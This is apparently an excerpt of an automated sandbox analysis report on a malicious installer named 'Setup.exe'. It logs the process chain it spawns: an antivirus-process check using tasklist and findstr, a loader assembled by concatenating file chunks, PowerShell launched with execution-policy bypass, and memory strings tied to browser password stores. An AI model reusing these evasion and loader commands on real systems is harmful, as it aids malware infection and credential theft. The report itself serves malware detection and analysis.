            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1240:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3136:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_03
            Source: C:\Users\user\Desktop\'Setup.exe | File created: C:\Users\user\AppData\Local\Temp\nsp39E5.tmp
            Source: 'Setup.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Users\user\Desktop\'Setup.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\'Setup.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: Contrast.com, 0000000A.00000003.2546320698.00000000045A2000.00000004.00000800.00020000.00000000.sdmp, Contrast.com, 0000000A.00000003.2503827669.000000000456C000.00000004.00000800.00020000.00000000.sdmp, Contrast.com, 0000000A.00000003.2503593210.0000000004596000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 'Setup.exe | ReversingLabs: Detection: 13%
            Source: C:\Users\user\Desktop\'Setup.exe | File read: C:\Users\user\Desktop\'Setup.exe
            Source: unknown | Process created: C:\Users\user\Desktop\'Setup.exe "C:\Users\user\Desktop\'Setup.exe"
            Source: C:\Users\user\Desktop\'Setup.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Hazard Hazard.cmd && Hazard.cmd
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 108941
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Lines + ..\Edmonton + ..\Characterization + ..\Tampa + ..\Poet + ..\Artwork + ..\Butts + ..\Harbor A
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\108941\Contrast.com Contrast.com A
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\VKLM5S46YTD8XS7X69X8S6283E.ps1"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\5TM3JMZQCYKEYRKL75T8.ps1"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\'Setup.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\'Setup.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\'Setup.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\'Setup.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\'Setup.exe | Section loaded: shfolder.dll
            Source: C:\Users\user\Desktop\'Setup.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\'Setup.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\'Setup.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\'Setup.exe | Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\'Setup.exe | Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\'Setup.exe | Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\'Setup.exe | Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\'Setup.exe | Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\'Setup.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\'Setup.exe | Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\'Setup.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\'Setup.exe | Section loaded: textshaping.dll
            Source: C:\Users\user\Desktop\'Setup.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\'Setup.exe | Section loaded: edputil.dll
            Source: C:\Users\user\Desktop\'Setup.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\'Setup.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\'Setup.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\'Setup.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\'Setup.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\'Setup.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\'Setup.exe | Section loaded: appresolver.dll
            Source: C:\Users\user\Desktop\'Setup.exe | Section loaded: bcp47langs.dll
            Source: C:\Users\user\Desktop\'Setup.exe | Section loaded: slc.dll
            Source: C:\Users\user\Desktop\'Setup.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\'Setup.exe | Section loaded: sppc.dll
            Source: C:\Users\user\Desktop\'Setup.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\'Setup.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
            Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
            Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
            Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
            Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: wsock32.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: winmm.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: mpr.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: wininet.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: userenv.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: napinsp.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: pnrpnsp.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: wshbth.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: nlaapi.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: mswsock.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: winrnr.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: webio.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: winnsi.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: schannel.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: ntasn1.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: ncrypt.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: ncryptsslp.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: msasn1.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: gpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: dpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: wbemcomn.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: amsi.dll
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\choice.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\'Setup.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: 'Setup.exe | Static file information: File size 1076464 > 1048576
            Source: 'Setup.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2866405600.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdbw source: powershell.exe, 00000011.00000002.2880384967.00000000075F3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000011.00000002.2880384967.00000000075F3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb% source: powershell.exe, 00000011.00000002.2866405600.0000000002FC7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000011.00000002.2866405600.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\'Setup.exe | Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406328
            Source: 'Setup.exe | Static PE information: real checksum: 0x10d97b should be: 0x10cb2c
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00538B75 push ecx; ret 10_2_00538B88
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_0052CBF1 push eax; retf 10_2_0052CBF8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_04105DD0 push esp; ret 14_2_04105DE3
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_04106A29 pushad ; ret 14_2_041071D3
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_049036AD push ebx; iretd 17_2_049036DA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_049036DB push ebx; iretd 17_2_049036DA

            Persistence and Installation Behavior

            barindex
            Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\108941\Contrast.com

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com Code function: 10_2_005959B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_005959B3
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com Code function: 10_2_00525EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_00525EDA
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com Code function: 10_2_005333B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_005333B7
            Source: C:\Users\user\Desktop\'Setup.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
